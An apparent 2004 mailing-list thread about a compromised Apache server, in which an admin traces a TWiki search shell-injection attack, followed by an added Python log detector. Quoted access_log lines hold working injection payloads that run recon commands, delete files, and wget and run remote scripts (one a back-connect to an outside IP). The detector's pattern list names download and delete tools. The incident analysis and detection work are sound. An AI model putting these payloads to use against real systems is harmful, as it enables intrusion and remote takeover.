On Wed, 24 Nov 2004, Steve Seremeth wrote:

> David Kramer wrote:
>
> > Anything else I should try?
> >
> > Should I panic more than I am? Right now I feel strongly this was a
> > benign "stupid Apache tricks" thing, and I need to find the hole and close
> > it, but no need to nuke the server and start over.
>
> To add to my off-list comments...
>
> I'm a little hazy on the details as this was a while ago, but here's
> what we found after the hacker had exploited a _known_ gaping hole in a
> php app one of our users was running:
>
> * They had dropped a false shell into /var/tmp that ran under the apache
>   user -- I think it listened on some funny port - and we discovered it
>   when we went to bounce apache and got some weird message
> * They tried to compile an irc bot (go figure)
> * Apache logs had the evidence:
>
> Several instances of this:
>
> ./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
>
> Nasty.
>
> I ran chkrootkit and it didn't find anything. I also did checksums
> against a lot of local binaries compared to known good ones to make sure
> they were the originals.
>
> I bet you are right that it's an apache-only thing, but I would be
> _really_ sure. I would also leave apache (and perhaps other daemons as
> well) down until you are sure you found the problem. Our offender came
> back once or twice more unsuccessfully.

I think I found it. I'm running TWiki, and at that time there were some
really nasty things happening in access_log and error_log.
Access_log:

200.175.37.89 - - [23/Nov/2004:22:59:19 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5067
66.196.91.123 - - [23/Nov/2004:22:59:55 -0500] "GET /docs/php/functions.html HTTP/1.0" 304 -
200.175.37.89 - - [23/Nov/2004:22:59:57 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 20131
200.175.37.89 - - [23/Nov/2004:23:00:31 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Bls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 58706
65.54.188.63 - - [23/Nov/2004:23:00:44 -0500] "GET /phpdemo/manual/function.asort.html HTTP/1.0" 200 3905
200.175.37.89 - - [23/Nov/2004:23:00:56 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Brm+-rf+*index*%3Bls+*index*%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3058
200.175.37.89 - - [23/Nov/2004:23:01:48 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+www.gigachat.net%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3059
66.196.90.228 - - [23/Nov/2004:23:02:13 -0500] "GET /robots.txt HTTP/1.0" 404 282
65.54.188.63 - - [23/Nov/2004:23:02:29 -0500] "GET /phpdemo/manual/function.xmldoc.html HTTP/1.0" 200 2314
66.196.90.245 - - [23/Nov/2004:23:02:59 -0500] "GET /twiki/bin/view/TWiki/TWikiMetaData HTTP/1.0" 200 18571
65.54.188.63 - - [23/Nov/2004:23:04:05 -0500] "GET /phpdemo/manual/function.rewinddir.html HTTP/1.0" 200 2208
200.212.114.3 - - [23/Nov/2004:23:04:40 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3051
200.212.114.3 - - [23/Nov/2004:23:05:02 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3013
200.212.114.3 - - [23/Nov/2004:23:05:47 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3570
65.54.188.63 - - [23/Nov/2004:23:05:55 -0500] "GET /phpdemo/manual/function.mssql-close.html HTTP/1.0" 200 3033
66.196.91.132 - - [23/Nov/2004:23:05:57 -0500] "GET /phpdemo/manual/function.cpdf-show-xy.html HTTP/1.0" 304 -
200.212.114.3 - - [23/Nov/2004:23:06:17 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3750
200.212.114.3 - - [23/Nov/2004:23:07:21 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 4868
66.196.90.105 - - [23/Nov/2004:23:07:28 -0500] "GET /docs/php/function.mcve-ub.html HTTP/1.0" 304 -
65.54.188.63 - - [23/Nov/2004:23:07:29 -0500] "GET /phpdemo/manual/function.sem-acquire.html HTTP/1.0" 200 2871
66.26.157.9 - - [23/Nov/2004:23:07:33 -0500] "GET /phpdemo/phpvscgi.html HTTP/1.1" 200 4109
200.212.114.3 - - [23/Nov/2004:23:07:47 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl+200.193.15.61+4%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 7178
200.212.114.3 - - [23/Nov/2004:23:08:11 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28pwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3593
65.

error_log:

[Tue Nov 23 20:18:13 2004] statistics: Use of uninitialized value in concatenation (.) or string at ../lib/TWiki.pm line 528.
. . .
[Tue Nov 23 22:08:46 2004] [error] PHP Warning: main(/top.inc) [<a href='http://thekramers.net/docs/php/function.main.html'>function.main.html</a>]: failed to open stream: No such file or directory in /srv/www/htdocs/tmp/20010708/index.phtml on line 5
[Tue Nov 23 22:08:46 2004] [error] PHP Fatal error: main() [<a href='http://thekramers.net/docs/php/function.require.html'>function.require.html</a>]: Failed opening required '/top.inc' (include_path='.:/usr/share/php') in /srv/www/htdocs/tmp/20010708/index.phtml on line 5
[Tue Nov 23 22:34:11 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
. . .
[Tue Nov 23 23:02:13 2004] [error] [client 66.196.90.228] File does not exist: /srv/www/twiki/robots.txt
[Tue Nov 23 23:02:58 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:04:39 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:02 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:46 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:06:14 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
--23:06:15--  http://bandits.webm.ru/xpl/cgi
           => `cgi'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,032 [text/plain]

    0K .......... ......                                    100%   37.46 KB/s

23:06:16 (37.46 KB/s) - `cgi' saved [17032/17032]

[Tue Nov 23 23:07:20 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
--23:07:20--  http://bandits.webm.ru/xpl/dc.pl
           => `dc.pl'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]

    0K                                                      100%  711.91 KB/s

23:07:21 (711.91 KB/s) - `dc.pl' saved [729/729]

[Tue Nov 23 23:07:45 2004] [notice] cannot use a full or relative URL in a 401 ErrorDocument directive --- ignoring!
--23:07:46--  http://bandits.webm.ru/xpl/dc.pl
           => `dc.pl.1'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]

    0K                                                      100%  711.91 KB/s

23:07:46 (711.91 KB/s) - `dc.pl.1' saved [729/729]

I will also note that the "bandits.webm.ru" website contains one phrase,
in Russian: "Soon it will begin..."

I'm going to disable TWiki for now.
---------------------------------------------------------------------------
DDDD   David Kramer        Partner, Agile Rules     http://www.agilerules.com
DK KD  162 Marett Road     Lexington, MA 02421      davidk at agilerules.com
DKK D
DK KD  Specializing in coaching and development in Agile/XP practices
DDDD   and embedded software development
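A detector for the pattern in the access_log above, as an added example that is not part of the original post and is not TWiki code. It parses common-log-format lines, URL-decodes every query parameter the same way the CGI would (so %27 becomes a quote and + becomes a space), and flags values that contain shell metacharacters or download-and-run tooling. The sample lines are copied from the thread's access_log plus one constructed benign search; the regex list, the function names and the field names in the result dicts are my own choices.

```python
"""Flag shell-command injection attempts in Apache access_log lines.

Added example (not from the original post or from TWiki). Sample log
lines: three are copied from the thread's access_log, the last one is a
constructed benign search so the detector has something to ignore.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache common log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Each pattern is matched against the *decoded* parameter value, which is
# what reaches the shell. A wiki search term should never contain these.
SUSPICIOUS = [
    (re.compile(r"'\s*;"), "quote-then-semicolon (breaks out of quoted shell argument)"),
    (re.compile(r"[;|`$]\s*\(|\)\s*[;|]"), "subshell / pipeline"),
    (re.compile(r"\b(wget|curl|fetch|lynx)\b"), "download tool"),
    (re.compile(r"\bchmod\s+[0-7]*7[0-7]*\b"), "chmod to executable"),
    (re.compile(r"\b(perl|sh|bash|python)\s+\S"), "interpreter invocation"),
    (re.compile(r"(\bcd\s+\.\.\s*;){2,}"), "repeated cd .. (directory climb)"),
    (re.compile(r"\brm\s+-rf?\b"), "recursive delete"),
    (re.compile(r"\b(uname|id|pwd)\b\s*[;)]"), "recon command"),
]

SAMPLE_LOG = [
    '200.175.37.89 - - [23/Nov/2004:22:59:19 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5067',
    '66.196.91.123 - - [23/Nov/2004:22:59:55 -0500] "GET /docs/php/functions.html HTTP/1.0" 304 -',
    '200.212.114.3 - - [23/Nov/2004:23:06:17 -0500] "GET /twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget+bandits.webm.ru%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3750',
    # constructed benign request, not from the thread
    '10.0.0.5 - - [23/Nov/2004:23:10:00 -0500] "GET /twiki/bin/search/Know/?scope=text&search=apache+config HTTP/1.1" 200 4120',
]


def decode_query(target):
    """Return {param: [decoded values]} for a request target.
    parse_qs undoes %XX escapes and turns '+' into a space, which is exactly
    the decoding the attacker relied on to get quotes and spaces to the shell."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def scan_line(line):
    """Return a list of hit dicts for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for param, values in decode_query(m.group("target")).items():
        for value in values:
            reasons = [why for rx, why in SUSPICIOUS if rx.search(value)]
            if reasons:
                hits.append({
                    "host": m.group("host"), "time": m.group("time"),
                    "status": m.group("status"), "param": param,
                    "payload": value, "reasons": reasons,
                })
    return hits or None


def scan_log(lines):
    """Scan an iterable of access_log lines and return every flagged entry."""
    flagged = []
    for line in lines:
        hits = scan_line(line)
        if hits:
            flagged.extend(hits)
    return flagged


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["host"]} status={hit["status"]} param={hit["param"]}')
        print(f'  payload: {hit["payload"]}')
        print(f'  reasons: {", ".join(hit["reasons"])}')
```

Decoded, the first payload reads `doesnotexist1'; (uname -a; id;pwd) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2`: the leading `';` closes the single-quoted search term, the subshell runs whatever the attacker wants, the sed wraps each output line so it looks like a `.txt` topic file name and gets rendered in the search results page, and the trailing `fgrep ... '` re-opens the quote so the command line stays syntactically valid. Note that the two `sh: -c: line 2: syntax error` entries in error_log each follow a request whose subshell is never closed (the 23:04:40 and 23:05:02 lines have `%7C` right after the command, with no `%29`), which is why those attempts failed and the attacker retried with the parenthesis. A 200 status on these requests is not evidence that the injection failed; it only means the search page rendered.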